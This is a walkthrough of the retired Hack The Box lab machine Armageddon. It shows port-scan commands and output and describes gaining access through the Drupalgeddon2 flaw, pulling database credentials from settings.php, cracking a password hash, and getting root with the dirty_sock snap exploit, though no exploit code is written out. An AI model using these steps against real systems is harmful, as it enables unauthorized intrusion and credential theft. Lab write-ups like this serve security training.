This post documents the complete walkthrough of Armageddon, a retired vulnerable VM created by bertolis, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Armageddon is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.233 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-03-28 14:34:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.233
Discovered open port 80/tcp on 10.10.10.233

Nothing unsual stands out. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p22,80 -A --reason 10.10.10.233 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

OK, at least we know it’s CentOS. This is what the http service looks like.

Why is Armageddon represented by a :chicken: :laughing:? Once we look at the HTML source code, it’s clear that we are dealing with Drupal 7 here.

CVE-2018-7600 - Drupalgeddon2

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

I found the perfect exploit.

Foothold

There you have it.

From apache to brucetherealadmin

There’s a user with a uid of 1000. I reckon user.txt is in the home directory of this user.

Getting the password hash from the database

The database configuration is in /var/www/html/sites/default/settings.php.

Armed with that, we can take a peek at Drupal’s users table, particularly brucetherealadmin.

Cracking the password hash with John the Ripper is a breeze.

Armed with the password, we can simply log in to the account with SSH and retrieve user.txt.

Privilege Escalation

During enumeration of brucetherealadmin’s account, I notice the account is able to sudo as root without password on the following.

I take it that I need a malicious snap package.

dirty_sock

Well, someone already left the dirty_sock exploit here. Thank you kind stranger! :heart_eyes:

The exploit adds a user (dirty_sock:dirty_sock) with full sudo access.

:dancer: